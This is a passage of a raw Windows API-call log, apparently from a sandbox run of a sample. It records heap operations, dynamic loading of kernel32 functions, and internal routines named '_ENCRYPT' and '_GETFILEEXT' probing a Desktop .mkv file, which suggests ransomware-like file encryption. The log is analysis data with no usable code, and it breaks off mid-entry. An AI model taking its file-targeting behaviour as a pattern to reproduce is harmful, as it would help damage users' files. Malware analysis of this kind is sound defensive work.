hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0161.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0161.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0161.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0161.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0161.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.449] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0161.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0161.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0161.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0161.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0161.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0161.450] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0161.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0161.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0161.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0161.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0161.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0161.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0161.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0161.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0161.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0161.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0161.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0161.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0161.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0161.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0161.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0161.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0161.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0161.451] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0161.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0161.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0161.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0161.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0161.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0161.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.451] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0161.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0161.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7b0 [0161.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd7b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0161.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.452] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0161.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0161.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0161.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0161.452] CloseHandle (hObject=0x138) returned 1 [0161.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0161.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0161.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0161.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0161.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0161.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0161.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0161.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0161.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0161.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0161.453] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0161.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0161.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0161.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0161.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.454] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0161.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0161.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0161.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0161.454] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0161.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0161.454] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0161.454] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0161.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.454] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0161.454] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0161.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0161.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0161.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0161.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0161.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.455] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.455] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0161.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0161.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0161.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.455] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.455] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.455] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ecd740, ftCreationTime.dwHighDateTime=0x1d5e024, ftLastAccessTime.dwLowDateTime=0x92721dc0, ftLastAccessTime.dwHighDateTime=0x1d5e470, ftLastWriteTime.dwLowDateTime=0x92721dc0, ftLastWriteTime.dwHighDateTime=0x1d5e470, nFileSizeHigh=0x0, nFileSizeLow=0x18b40, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gV7qJagBY9A.mkv", cAlternateFileName="GV7QJA~1.MKV")) returned 0x90add8 [0161.456] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0161.456] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.456] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ecd740, ftCreationTime.dwHighDateTime=0x1d5e024, ftLastAccessTime.dwLowDateTime=0x92721dc0, ftLastAccessTime.dwHighDateTime=0x1d5e470, ftLastWriteTime.dwLowDateTime=0x92721dc0, ftLastWriteTime.dwHighDateTime=0x1d5e470, nFileSizeHigh=0x0, nFileSizeLow=0x18b40, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="gV7qJagBY9A.mkv", cAlternateFileName="GV7QJA~1.MKV")) returned 0x90add8 [0161.457] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0161.457] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", 